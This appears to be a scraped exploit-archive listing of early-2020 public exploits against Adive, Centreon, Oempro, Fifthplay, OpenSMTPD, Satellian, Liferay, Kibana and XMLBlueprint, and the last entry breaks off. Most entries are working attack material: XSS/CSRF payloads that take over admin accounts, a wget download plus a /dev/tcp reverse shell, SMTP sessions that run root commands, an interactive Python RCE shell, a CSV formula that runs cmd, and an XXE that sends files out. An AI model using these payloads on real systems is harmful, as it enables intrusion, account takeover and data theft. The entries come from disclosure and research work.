↧
macOS / iOS ImageIO Heap Corruption
↧
Adive Framework 2.0.8 Cross Site Request Forgery
Adive Framework version 2.0.8 suffers from a cross site request forgery vulnerability.
7371cbb8af379c727e1db01ad30d3a57# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Sarthak Saini
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# CVE:CVE-2020-7991
# Category: Webapps
# Tested on: windows64bit / mozila firefox
#
#
|--!>
|----------------------------------------------------------------------------------
1) Persistent Cross-site Scripting at user add page
Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
Payload:- <script>alert(1)</script>
POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1
userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3
|----------------------------------------------------------------------------------
2) account takeover - cross side request forgery (Change Admin Password)
Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.
-> Save the payload as exp.js
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute()
{
var nuri ="http://192.168.2.5/admin/config";
xhttp = new XMLHttpRequest();
xhttp.open("POST", nuri, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = "true";
var body = "";
body += "\r\n\r\n";
body +=
"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
xhttp.send(body);
return true;
}
execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
-> Start a server and host the exp.js. Send the exp.js file in the xss payload
Payload:- <script src="http://192.168.2.5/exp.js"></script>
POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1
userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3
-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123
|-----------------------------------------EOF-----------------------------------------
↧
↧
Centreon 19.10.5 Credential Disclosure
Centreon version 19.10.5 suffers from a database credential disclosure vulnerability.
015b6cc11fc60b7914ed4e83bae7f78e# Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Database Credentials Disclosure
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
###########################################################################################################
POC:
- Configuration / Pollers / Broker configuration
-- Central-broker | Central-broker-master
--- Output
It is possible to discover the unencrypted password with the inspector.
DB user centreon
DB password ********
<input size="120" name="output[0][db_password]" type="password" value="ZVy892xx">
↧
Centreon 19.10.5 Remote Command Execution
Centreon version 19.10.5 suffers from a remote command execution vulnerability.
720289cefc640adba74c7462a3b1fab7# Exploit Title: Centreon 19.10.5 - Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri BASO
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution Resources
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to call binaries not only in default $USER$ path by adding Poller's Resources.
By adding two entries it is possible to trigger a download exec reverse shell.
Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default.
Steps:
Objective 1 : Add Download Resource
Objective 2 : Add Exec Resource
Objective 3 : Create your both commands check
Objective 4 : Create your services and link them with a host
Restart the Central.
###########################################################################################################
# Objective 1 : Add Download Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
- Information:
Read Centreon documentation:
To install Centreon software from the repository, you should first install the centreon-release package,
which will provide the repository file. Some may not have the wget package installed.
If not perform the following : yum install wget
Solution 1: Remove restriction in Configuration/Pollers/Engine configuration
Solution 2: Modify input size inspector in client side <input> size="250"
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh
# Objective 2 : Add Exec Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
Solution: Use a custom payload -> bash /tmp/x.sh
# Objective 3 : Create your both commands check with your resources $xxx$ without arguments
# Objective 4 : Create your services and link them with a host
POC:
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -
nc -lvnp 1234
Ncat: Version 7.50
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:43128.
id
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
sudo -l
Matching Defaults entries for centreon-engine on centreon-lab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon-engine may run the following commands on centreon-lab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
↧
Octeth Oempro 4.8 SQL Injection
Octeth Oempro version 4.8 suffers from a remote SQL injection vulnerability.
c2d16eb03aeacd51c72d6f62f08792af# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740
An authenticated user can easily exploit this vulnerability. Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
is vulnerable.
# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019'&responseformat=JSON
# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON
↧
↧
Fifthplay S.A.M.I Cross Site Request Forgery / Cross Site Scripting
Fifthplay S.A.M.I suffers from cross site request forgery and persistent cross site scripting vulnerabilities.
bebdd5f220b92068c205b2449bc5e81e
Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS
Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2
HAM V1.1
HAM V1.0
DINHAM 10W
Image Version: 2019.3-20190605144803
2019.2_HP-20190808154634
2018.4_HP-20181015152950
2018.2-20180516100815
2017.2_HP-20180213083050
2013.4_HP-201309301203
AMP Version: 2019.2_HP
2018.4_HP
2017.2_HP
2013.4_HP
R20.19.03
R20.18.02
Fix: 2017.2-HP4
2018.4_HP3
2018.5_HP7
2019.2_HP3
2019.3_HP1
Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group.
We specialise in enriching smart homes and buildings for almost 10 years, and in
services that provide comfort and energy. Our gateway provides a modular approach
to integrating old and new technologies, such as smart meters, optical meters,
sockets, switches. Fifthplay is a trendsetter with regards to smart homes and buildings
and one of the sector's most innovative companies.
Desc: The application suffers from an unauthenticated stored XSS through POST request.
The issue is triggered when input passed via several parameters is not properly
sanitized before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site. The
application interface also allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited
to perform certain actions if a user visits a malicious web site.
Tested on: lighttpd/1.4.33
PHP/5.4.33
PHP/5.3.19
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5561
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php
29.09.2019
--
Stored XSS:
-----------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value='"><script>prompt(251)</script>' />
<input type="hidden" name="port" value='"><script>prompt(252)</script>' />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value='"><script>prompt(253)</script>' />
<input type="hidden" name="pass" value='"><script>prompt(254)</script>' />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Set proxy CSRF:
---------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Delete proxy CSRF:
------------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Clear" />
</form>
</body>
</html>
↧
OpenBSD OpenSMTPD Privilege Escalation / Code Execution
Qualys discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This vulnerability is exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands, as root.
a167abd4844564a180e18a022a305764
Qualys Security Advisory
LPE and RCE in OpenSMTPD (CVE-2020-7247)
==============================================================================
Contents
==============================================================================
Summary
Analysis
Exploitation
Acknowledgments
==============================================================================
Summary
==============================================================================
We discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This
vulnerability is exploitable since May 2018 (commit a8e222352f, "switch
smtpd to new grammar") and allows an attacker to execute arbitrary shell
commands, as root:
- either locally, in OpenSMTPD's default configuration (which listens on
the loopback interface and only accepts mail from localhost);
- or locally and remotely, in OpenSMTPD's "uncommented" default
configuration (which listens on all interfaces and accepts external
mail).
We developed a simple proof of concept and successfully tested it
against OpenBSD 6.6 (the current release) and Debian testing (Bullseye);
other versions and distributions may be exploitable.
==============================================================================
Analysis
==============================================================================
OpenSMTPD's smtp_mailaddr() function is responsible for validating
sender (MAIL FROM) and recipient (RCPT TO) mail addresses:
------------------------------------------------------------------------------
2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191 const char *domain)
2192 {
....
2218 if (!valid_localpart(maddr->user) ||
2219 !valid_domainpart(maddr->domain)) {
....
2234 return (0);
2235 }
2236
2237 return (1);
2238 }
------------------------------------------------------------------------------
- it calls valid_domainpart() to validate the domain name (after the @
sign) of a mail address -- this function only accepts IPv4 and IPv6
addresses, and alpha-numeric, '.', '-', and '_' characters;
- it calls valid_localpart() to validate the local part (before the @
sign) of a mail address -- this function only accepts alpha-numeric,
'.', and MAILADDR_ALLOWED characters (a white list from RFC 5322):
71 #define MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"
Among the characters in MAILADDR_ALLOWED, the ones that are also in
MAILADDR_ESCAPE are later transformed into ':' characters (escaped) by
mda_expand_token():
72 #define MAILADDR_ESCAPE "!#$%&'*?`{|}~"
smtp_mailaddr()'s white-listing and mda_expand_token()'s escaping are
fundamental to OpenSMTPD's security -- they prevent dangerous characters
from reaching the shell that executes MDA commands (in mda_unpriv()):
execle("/bin/sh", "/bin/sh", "-c", mda_command, (char *)NULL,
mda_environ);
Mail Delivery Agents (MDAs) are responsible for delivering mail to local
recipients; for example, OpenSMTPD's default MDA method is "mbox", and
the corresponding MDA command is (in parse.y):
asprintf(&dispatcher->u.local.command,
"/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}");
where %{user.username} is the name of an existing local user (the local
part of the recipient address), and %{mbox.from} is the sender address
(which would be under the complete control of an attacker if it were not
for smtp_mailaddr()'s white-listing and mda_expand_token()'s escaping).
Unfortunately, we discovered a vulnerability in smtp_mailaddr()
(CVE-2020-7247):
------------------------------------------------------------------------------
2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191 const char *domain)
2192 {
....
2218 if (!valid_localpart(maddr->user) ||
2219 !valid_domainpart(maddr->domain)) {
....
2229 if (maddr->domain[0] == '\0') {
2230 (void)strlcpy(maddr->domain, domain,
2231 sizeof(maddr->domain));
2232 return (1);
2233 }
2234 return (0);
2235 }
2236
2237 return (1);
2238 }
------------------------------------------------------------------------------
If the local part of an address is invalid (line 2218) and if its domain
name is empty (line 2229), then smtp_mailaddr() adds the default domain
automatically (line 2230) and returns 1 (line 2232), although it should
return 0 because the local part of the address is invalid (for example,
because it contains invalid characters).
As a result, an attacker can pass dangerous characters that are not in
MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (';' and '' in particular)
to the shell that executes the MDA command. For example, the following
local SMTP session executes "sleep 66" as root, in OpenSMTPD's default
configuration:
------------------------------------------------------------------------------
$ nc 127.0.0.1 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you
MAIL FROM:<;sleep 66;>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
How about a nice game of chess?
.
250 2.0.0 e6330998 Message accepted for delivery
QUIT
221 2.0.0 Bye
------------------------------------------------------------------------------
==============================================================================
Exploitation
==============================================================================
Nevertheless, our ability to execute arbitrary shell commands through
the local part of the sender address is rather limited:
- although OpenSMTPD is less restrictive than RFC 5321, the maximum
length of a local part should be 64 characters;
- the characters in MAILADDR_ESCAPE (for example, '$' and '|') are
transformed into ':' characters.
To overcome these limitations, we drew inspiration from the Morris worm
(https://spaf.cerias.purdue.edu/tech-reps/823.pdf), which exploited the
DEBUG vulnerability in Sendmail by executing the body of a mail as a
shell script:
------------------------------------------------------------------------------
debug
mail from: </dev/null>
rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
data
cd /usr/tmp
cat > x14481910.c <<'EOF'
[text of vector program]
EOF
cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;
rm -f x14481910 x14481910.c
.
quit
------------------------------------------------------------------------------
Indeed, the standard input of an MDA command is the mail itself: "sed"
removes the headers (which were added automatically by the mail server)
and "/bin/sh" executes the body.
We cannot simply reuse this command (because we cannot use the '|' and
'>' characters), but we can use "read" to remove N header lines (where N
is greater than the number of header lines added by the mail server) and
prepend a "NOP slide" of N comment lines to the body of our mail. For
example, the following remote SMTP session executes the body of our
mail, as root, in OpenSMTPD's "uncommented" default configuration:
------------------------------------------------------------------------------
$ nc 192.168.56.143 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [192.168.56.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<root@example.org>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
for i in W O P R; do
echo -n "($i) "&& id || break
done >> /root/x."`id -u`"."$$"
.
250 2.0.0 4cdd24df Message accepted for delivery
QUIT
221 2.0.0 Bye
------------------------------------------------------------------------------
==============================================================================
Acknowledgments
==============================================================================
We thank the OpenBSD developers for their great work and their quick
response.
[https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner>
This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.
↧
Satellian 1.12 Remote Code Execution
Satellian version 1.1.2 suffers from a remote code execution vulnerability.
90b23d985f921aca674273a9e9779b92# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://<redacted>
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=0(root)
import requests
import argparse
import sys
import calendar
import time
from termcolor import colored
def cprint(text, color): # colored print
sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))
def httpize(url):
if not url.startswith("http"):
cprint("Missing protocol, using http . . .", "yellow")
url = "http://" + url
return url
def send_command(url, command, verbose):
RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
string_to_split = '''"SUCCESS_"
},'''
if verbose:
cprint("Starting request to %s" % url, "yellow")
cprint("Executing command %s" % command, "yellow")
a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')
if len(command_output) < 4 and verbose:
cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
sys.exit()
print command_output
cprint("""
________________________________________
(__) / \\
(oo) ( Intellian Satellite Terminal PoC )
/-------\\/ --' \\________________________________________/
/ | ||
* ||----||
""", "green")
parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
parser.add_argument("-u", "--url", help="Base url")
args = parser.parse_args()
if args.url is None:
cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
sys.exit()
url = httpize(args.url)
def main():
cprint("Performing initial scan. Listing available system binaries.", "green")
send_command(url, '/bin/ls /bin', True)
while True:
command = raw_input('Satellian $ ')
send_command(url, command, False)
if __name__ == '__main__':
try:
main()
except Exception as e:
print e
print "\nAn error happened."
↧
Liferay CE Portal 6.0.2 Remote Command Execution
Liferay CE Portal version 6.0.2 remote command execution exploit.
2e97967f982bad0875dc061a64b26b80# Exploit Title: Liferay CE Portal 6.0.2 - Remote Command Execution
# Google Dork: N/A
# Date: 2020-01-29
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://sourceforge.net/projects/lportal/files/Liferay%20Portal/6.0.2/
# https://github.com/chakadev/Liferay-CE-Portal-Java-Deserialization
# Version: 6.0.2
# Tested on: MacOS
# CVE : N/A
#PoC
I already shared payloads in my github repo (Because payloads so small and
have a meta character). You must find the right syntax by brute-force
method.Payloads I share are for time-based proof of concept (sleep 10). The
application may not always output the command. That's why you should try
time-based payload while doing PoC.
POST /api/liferay HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
PAYLOADS HERE
↧
↧
Kibana 6.6.1 CSV Injection
Kibana version 6.6.1 suffers from a CSV injection vulnerability.
f8bb513078766e65b1a38b9540b070d4# Exploit Title: Kibana 6.6.1 - CSV Injection
# Google Dork: inurl:"/app/kibana" intitle:"Kibana"
# Date: 2020-01-15
# Exploit Author: Aamir Rehman
# Vendor Homepage: https://www.elastic.co/kibana
# Software Link: https://www.elastic.co/downloads/
# Version: v6.6.1 possibly latest versions
# Tested on: Kibana 6.6.1 - Firefox/Windows
# References:
# https://the-it-wonders.blogspot.com/2020/01/csv-injection-in-kibana-661-possibly.html
# https://github.com/elastic/kibana/issues/56081
# Software description:
Kibana is an open source data visualization dashboard for Elasticsearch. It provides visualization capabilities on top of the content indexed on an Elasticsearch cluster. Users can create bar, line and scatter plots, or pie charts and maps on top of large volumes of data.
# Technical Details & Impact:
Most of the kibana applications are having authentication disabled any malicious user can inject csv payload in visualization section of dashboard and It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.
# POC
1. Click on Dashboard tab and select any dashboard from the list. I would suggest to select the dashboard which has Gauge or Line visualization type.
2. Once you are on dashboard click on "Edit button" on top right of the page.
3. Click "gear (options)" button of any graphical view box.
4. It will open a options box click on "edit visualization".
5. It will open the edit page click on any "Blue play button" in front of any metric.
6. Here you can edit the metric's information; we will be exploiting the "Custom Label" field
7. In custom Label field enter your csv injection payload e.g. @SUM(1+1)*cmd|' /c calc'!A0.
8. All is done now click on Top "blue play button" to save the settings and click on SAVE button open top right of the page.
9. Go back to dashboard graphical view, you will see your csv payload their. Click on 3dots buttons on top of the graphical box click on "INSPECT".
10. It will open the export panel click on download csv and click formatted csv.
# Timeline
15-01-2020 - Vulnerability discovered
27-01-2020 - Vendor contacted
28-01-2020 - Vendor responded, not marking it as a security flaw. Git issue has been created. (https://github.com/elastic/kibana/issues/56081)
28-01-2020 – Requested vendor for disclosure.
29-01-2020 - Full Disclosure
↧
XMLBlueprint 16.191112 XML Injection
XMLBlueprint version 16.191112 suffers from an XML external entity injection vulnerability.
6fc60d30c5cfdc3911a73e4c53bcd2ff# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-14
# Vendor: XMLBlueprint XML Editor
# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
# Affected Version: 16.191112 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19032
# References:
# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/
# 1. Technical Description
# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
# Injection vulnerability through the malicious XML file. This allows a malicious user
# to read arbitrary files.
# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.
python -m SimpleHTTPServer 80
# 2.2 Upload the payload.dtd file to your web server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;
# 2.3 Create a secret.txt file with any content in desktop.
# 2.4 Open poc.xml and click XML -> Validate
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2.5 Your web server will receive a request with the contents of the secret.txt file
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure
# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
↧
Centreon 19.10.5 Remote Command Execution
Centreon version 19.10.5 suffers from a centreontrapd remote command execution vulnerability.
e4cd583822c0120dac35bdb7b26bf32b# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.
Steps:
Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3
Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign service trap relation
Objective 4 : Get centreon id reverse shell
###########################################################################################################
# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration > SNMP Traps
[+] Trap name * : linkDown
[+] OID * : .1.3.6.1.6.3.1.1.5.3
